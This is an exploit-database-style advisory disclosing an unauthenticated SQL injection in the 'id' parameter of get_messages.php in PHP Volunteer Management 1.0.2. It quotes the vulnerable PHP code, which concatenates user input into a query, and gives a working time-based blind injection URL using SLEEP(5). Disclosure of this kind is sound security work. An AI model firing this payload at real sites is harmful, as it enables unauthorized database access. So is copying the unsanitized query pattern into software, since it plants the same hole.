# Title: PHP Volunteer Management (get_messages.php) SQL Injection Vulnerabilities # # Author: eidelweiss # Twitter: @AriosRandy # Website: www.eidelweiss.info # Software Site: https://sourceforge.net/projects/phpvolunteer/ # Version: 1.0.2 # Category: webapp (php) # Greetz: Devilzc0de, exploit-db, G13 (first vuln Disclose http://www.exploit-db.com/exploits/18788/) and YOU !!! ##### ToC ##### 0x01 Description 0x02 vuln c0de ##### 0x01 Description ##### This is a PHP Volunteer Management software. Keep track of Volunteer hours worked and location assignments. This system is built on PHP/MySql. ##### 0x02 vuln c0de ##### ---------------Vulnerability------------------- get_messages.php == <?php define('INCLUDE_CHECK',true); include '../../../config/connect.php'; $id = $_GET['id']; $query = "SELECT * FROM messages, volunteers WHERE message_to_id = '$id' AND message_from_id = volunteer_id ORDER BY message_state, message_id"; $mysql_result = mysql_query($query); $result = array(); while ($row = mysql_fetch_assoc($mysql_result)) { $result[] = $row; } $data = json_encode($result); print_r($data); ?> == The 'id' parameter is vulnerable to SQL Injection. No authentication is needed. ----------Exploit----------------------------------- http://localhost/mods/messages/data/get_messages.php?id=[SQLi]&take=10&skip=0&page=1&pageSize=10 ------------PoC--------------------------- http://localhost/mods/messages/data/get_messages.php?id=1%27%20AND%20SLEEP%285%29%20AND%20%27BDzu%27=%27BDzu&take=10&skip=0&page=1&pageSize=10 ##### E0F #####